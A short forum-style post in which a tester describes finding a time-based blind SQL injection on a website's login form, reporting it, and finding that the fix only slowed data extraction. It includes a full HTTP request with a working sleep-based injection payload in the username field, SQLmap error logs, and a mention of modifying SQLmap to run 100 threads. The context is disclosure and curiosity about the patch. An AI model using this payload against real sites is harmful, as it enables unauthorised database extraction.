I recently discovered an time-based blind SQL injection attack on one of the websites. I was able to dump the data with 100 threads (By default, SQLmap doesn't allow more than 10 but, I modified the source code) running in parallel at a rate of about 30 rows of records an hour.
POST /login HTTP/1.1
Host: somehost.com
Origin: https://somehost.com
Cookie: _session=AWFREYEH345gWwf4yyeGGwtw5ye987p520jwfREWT2qYKUYT43
Upgrade-Insecure-Requests: 1
Referer: https://somehost.com
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: AppleWebKit/537.36 (KHTML, like Gecko) Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Length: 81
username=CvtKevBJ'%2b(select*from(select(sleep(5)))a)%2b'&password=b2R%21e0p%21M5
3 days after I reported the issue, the developers mentioned that they have "applied a patch" and asked me to test again. The issue still existed. The payload above in the username field still caused a 5 second delay in the response however, I could not extract the data with the same rate. It had significantly slowed down to some 3-ish records in 16 hours. SQLMap kept throwing this error:
[10:05:38] [ERROR] invalid character detected. retrying..
[10:05:38] [WARNING] increasing time delay to 23 seconds
[10:05:38] [ERROR] invalid character detected. retrying..
[10:05:38] [WARNING] increasing time delay to 24 seconds
[10:05:38] [ERROR] invalid character detected. retrying..
[10:05:38] [WARNING] increasing time delay to 25 seconds
[10:16:28] [ERROR] invalid character detected. retrying..
[10:16:28] [WARNING] increasing time delay to 26 seconds
[10:17:44] [ERROR] invalid character detected. retrying..
[10:17:44] [WARNING] increasing time delay to 27 seconds
I was wondering what patch it could have been.
